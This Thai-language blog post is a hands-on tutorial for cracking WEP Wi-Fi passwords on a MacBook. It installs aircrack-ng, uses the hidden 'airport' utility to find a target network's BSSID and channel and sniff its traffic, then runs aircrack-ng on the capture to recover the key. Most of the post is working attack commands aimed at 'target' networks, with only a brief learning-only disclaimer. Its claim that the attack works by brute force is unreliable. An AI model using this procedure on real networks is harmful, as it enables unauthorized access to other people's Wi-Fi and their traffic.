Macbook Aircrack and WEP wifi

เขียนเมื่อปี 2016 สมัยเรียน พอดี blog ลบไปแล้วเลยนำกลับมาลงใหม่ที่นี่

Macbook สามารถทำอะไรได้หลายอย่างที่คาดไม่ถึง ซี่รี่ย์ที่จะเล่าให้ฟังต่อจากนี้เป็นความรู้ที่ได้จากผจญภัยไปตามขอบของความเป็นไปได้ด้วย Macbook คู่ใจของเขา ต้องบุกบั่น ฝ่าฟัน พาดผ่าน อุปสรรค อันตรายนานาประการ เห็นได้ชัดเจนจากการล้างเครื่องของเขาที่ทำเกือบจะทุกเดือน

ความรู้ที่ได้นี้ เอาไว้ใช้เพื่อการเรียนรู้เท่านั้นนะครับ อย่าทำให้ผู้อื่นเดือดร้อน

จริงๆแล้ว Macbook เพียงลำพัง(ไม่ต้องซื้อwireless card เพิ่ม)สามารถแกะรหัส WPA/WPA2 ได้เหมือนกัน ใช้เทคนิค [precomputed rainbow table](https://en.wikipedia.org/wiki/Rainbow_table) หรือจะใช้ช่องว่าง [WPS](https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup) ก็ได้นะ เก็บไว้เป็นโอกาสหน้านะครับ นักผจญภัยจะมาเล่าเรื่องให้ฟังครับ

มาเริ่มกันเลย

```bash
กด option + คลิกบนไอคอนแสดงไวไฟที่มุมบนขวา
```

Image for post
Image for post

ตรง Security ต้องแสดงเป็น WEP นะครับ อย่าง network นี้เป็น WPA2 Enterprise จึงไม่สามารถใช้เป็นตัวทดสอบได้

ต่อมาเราต้องการใช้ hidden tool ของ system ที่ชื่อ airport เราจึงใช้คำสั่งลงบน terminal ครับ

```zsh
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
```

หลังจากนี้เราต้องลง aircrack-ng กันก่อนนะครับ โดยลงผ่าน [brew](http://brew.sh) ใช้คำสั่ง
```zsh
ruby -e “$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
```
ลง aircrack-ng
```zsh
brew install aircrack-ng
```

ตอนนีเครื่องเราก็มีความพร้อมที่จะกู้รหัสผ่าน network ที่เราต้องการแล้วนะครับ ดูไปพร้อมกันเลยนะครับว่าทำอย่างไร
1. หาข้อมูลเป้าหมาย สิ่งที่ต้องหาคือ BSSID กับ Chanel และตรวจอีกทีให้แน่ใจว่าเป้าหมายใช้ WEP
```zsh
sudo airport -s
```

Image for post
Image for post

2. เก็บข้อมูลเป้าหมาย
```zsh
sudo airport en0 sniff <chanel> #ที่ได้จากข้อ 1
```
3. เปิด tab ใหม่เพื่อเริ่มแกะรหัส และให้การเก็บข้อมูลเป็นไปอย่างต่อเนื่อง โดยกด command + t

4. ทำการแกะรหัส! ต้องจำชื่อไฟล์ที่ใหม่ที่สุด(ถ้าสังเกตก็จะพบว่าขนาดไฟล์กำลังใหญ่ขึ้น เพราะกำลังเก็บข้อมูลเป้าหมายไปด้วยนั้นเอง)
```bash
cd /tmp #ไปที่เก็บข้อมูล
ls -lH *.cap #จำชื่อไฟล์ที่เก็บมา เอาอันที่ใหม่ที่สุด
aircrack-ng -a 1 -b <bssid> <ชื่อไฟล์> #bssid ที่ได้จากข้อ 1
```

Image for post
Image for post
Image for post
Image for post

5. ทดสอบความถูกต้อง โดยนำรหัสที่ได้ ลบเครื่อง”:” ที่คั่นกลางออกแล้วใช้มันเป็นรหัส wifi เช่น จาก “A4:0C:EC:73:15” → “A40CEC7315”

Image for post
Image for post

WEP ที่ถูกแกะนั้นคือ WEP 40-bit แต่ถ้าหาก WEP 128-bit การแกะรหัสแบบนี้จะยากมาก(นาน)เพราะคำสั่งนี้ใช้กระบวนการ brute force(ไล่ใส่ทุกๆรหัสที่เป็นไปได้) ดังนั้น WEP ถึงเป็นการเข้ารหัสแบบเก่าก็ไม่จำเป็นว่าจะต้องง่าย และเร็วเสมอไปนะครับ

เครื่องที่ผมใช้คือ Macbook air 13" Early 2014

tags: hack, แฮ็ค, wifi, ไวไฟ, macbook, wep, hotspot, network, crack

Written by

A quant, ML Engineer— Pythonista — hacker. nutchanon.org

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store